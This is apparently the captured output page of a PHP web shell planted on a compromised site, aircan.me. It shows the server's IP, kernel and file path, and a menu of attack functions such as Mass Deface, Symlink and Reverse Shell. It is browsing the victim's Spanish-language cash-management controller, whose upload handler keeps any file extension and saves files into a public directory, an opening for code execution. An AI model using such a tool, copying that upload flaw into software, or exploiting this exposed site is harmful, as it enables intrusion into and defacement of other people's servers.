Tul xxx Tul
User / IP
:
216.73.217.33
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
siscaps
/
controllers
/
Viewing: CashPendingController.php
<?php class CashPendingController extends BaseController { private function ensureCsrf(): string { if (empty($_SESSION['csrf'])) { $_SESSION['csrf'] = bin2hex(random_bytes(32)); } return $_SESSION['csrf']; } private function requireUser(): array { $user = getCurrentUser(); if (!$user) { redirect('login'); exit; } return $user; } private function handleDocumentUpload(array $file): ?string { if (empty($file['tmp_name']) || (int)$file['error'] !== UPLOAD_ERR_OK) { return null; } $extension = strtolower(pathinfo($file['name'] ?? '', PATHINFO_EXTENSION)); if ($extension === '') { $extension = 'dat'; } $targetDir = dirname(__DIR__) . '/public/uploads/pending'; if (!is_dir($targetDir)) { @mkdir($targetDir, 0775, true); } $filename = 'pending_' . date('Ymd_His') . '_' . bin2hex(random_bytes(4)) . '.' . $extension; $destination = $targetDir . '/' . $filename; if (!move_uploaded_file($file['tmp_name'], $destination)) { throw new RuntimeException('No se pudo guardar el archivo adjunto.'); } return 'uploads/pending/' . $filename; } public function index(): void { $user = $this->requireUser(); $csrf = $this->ensureCsrf(); $deliveryUserId = ($user['role'] ?? '') === 'ADMIN' ? null : (int)($user['id'] ?? 0); $closures = CashClosure::listForDelivery($deliveryUserId, ['GENERATED','DELIVERED','PARTIALLY_USED','PENDING_DEPOSIT']); $openId = (int)($_GET['open'] ?? 0); $items = []; $metrics = [ 'to_receive' => 0, 'in_progress' => 0, 'pending_amount' => 0.0, 'ready_to_deposit' => 0, ]; foreach ($closures as $closure) { $batch = CashPendingBatch::findByClosure((int)$closure['id']); $movements = $batch ? CashPendingMovement::forBatch((int)$batch['id']) : []; $status = $closure['status'] ?? 'GENERATED'; if (!$batch && $status === 'GENERATED') { $metrics['to_receive']++; } elseif (in_array($status, ['DELIVERED','PARTIALLY_USED'], true)) { $metrics['in_progress']++; } elseif ($status === 'PENDING_DEPOSIT') { $metrics['ready_to_deposit']++; } $metrics['pending_amount'] += (float)($closure['pending_amount'] ?? 0); $items[] = [ 'closure' => $closure, 'batch' => $batch, 'movements' => $movements, ]; } $openClosureId = $openId; require __DIR__ . '/../views/caja/pending.php'; } public function receive(): void { if (($_SERVER['REQUEST_METHOD'] ?? 'GET') !== 'POST') { redirect('cashpending.index'); } if (!$this->validateCsrf()) { http_response_code(400); echo 'CSRF inválido'; return; } $user = $this->requireUser(); $closureId = (int)($_POST['closure_id'] ?? 0); $notes = trim((string)($_POST['notes'] ?? '')); if ($closureId <= 0) { setFlashMessage('error', 'Cierre inválido.'); redirect('cashpending.index'); } $closure = CashClosure::findById($closureId); if (!$closure) { setFlashMessage('error', 'El cierre indicado no existe.'); redirect('cashpending.index'); } if (!in_array($closure['status'], ['GENERATED','DELIVERED'], true)) { setFlashMessage('error', 'Este cierre ya fue procesado.'); redirect('cashpending.index'); } $amount = (float)($closure['delivered_amount'] ?? 0); if ($amount <= 0) { setFlashMessage('error', 'El cierre no tiene un monto a entregar.'); redirect('cashpending.index'); } $pdo = (new Database())->getConnection(); try { $pdo->beginTransaction(); CashClosure::updateFields($closureId, [ 'delivery_user_id' => (int)$user['id'], 'pending_amount' => $amount, 'status' => 'DELIVERED', 'notes' => $notes !== '' ? $notes : $closure['notes'], ], $pdo); CashPendingBatch::findOrCreateForClosure( $closureId, (int)$user['id'], $amount, $notes !== '' ? $notes : null, $pdo ); $pdo->commit(); setFlashMessage('success', 'Se registró la recepción del cierre #' . $closure['consecutive'] . '.'); } catch (Throwable $e) { if ($pdo->inTransaction()) { $pdo->rollBack(); } setFlashMessage('error', 'No se pudo registrar la recepción: ' . $e->getMessage()); } redirect('cashpending.index'); } public function storeMovement(): void { if (($_SERVER['REQUEST_METHOD'] ?? 'GET') !== 'POST') { redirect('cashpending.index'); } if (!$this->validateCsrf()) { http_response_code(400); echo 'CSRF inválido'; return; } $user = $this->requireUser(); $batchId = (int)($_POST['batch_id'] ?? 0); $movementType = strtoupper(trim((string)($_POST['movement_type'] ?? ''))); $reference = trim((string)($_POST['reference'] ?? '')); $description = trim((string)($_POST['description'] ?? '')); $amount = (float)($_POST['amount'] ?? 0); if ($batchId <= 0 || !in_array($movementType, ['USO','DEPOSITO'], true)) { setFlashMessage('error', 'Datos del movimiento inválidos.'); redirect('cashpending.index'); } $batch = CashPendingBatch::find($batchId); if (!$batch) { setFlashMessage('error', 'No se encontró el lote pendiente.'); redirect('cashpending.index'); } $closure = CashClosure::findById((int)$batch['closure_id']); if (!$closure) { setFlashMessage('error', 'Cierre asociado no disponible.'); redirect('cashpending.index'); } try { $documentPath = null; $hasFile = !empty($_FILES['document']) && !empty($_FILES['document']['tmp_name']); if ($hasFile) { $documentPath = $this->handleDocumentUpload($_FILES['document']); } elseif ($movementType === 'DEPOSITO') { throw new RuntimeException('Debes adjuntar el baucher del depósito.'); } CashPendingBatch::applyMovement( $batchId, $movementType, $amount, [ 'reference' => $reference ?: null, 'description' => $description ?: null, 'document_path' => $documentPath, 'user_id' => (int)$user['id'], ] ); $message = $movementType === 'USO' ? 'Uso registrado correctamente.' : 'Depósito registrado y baucher guardado.'; setFlashMessage('success', $message); } catch (Throwable $e) { setFlashMessage('error', 'No se pudo registrar el movimiento: ' . $e->getMessage()); } redirect('cashpending.index'); } }
Coded With 💗 by
0x6ick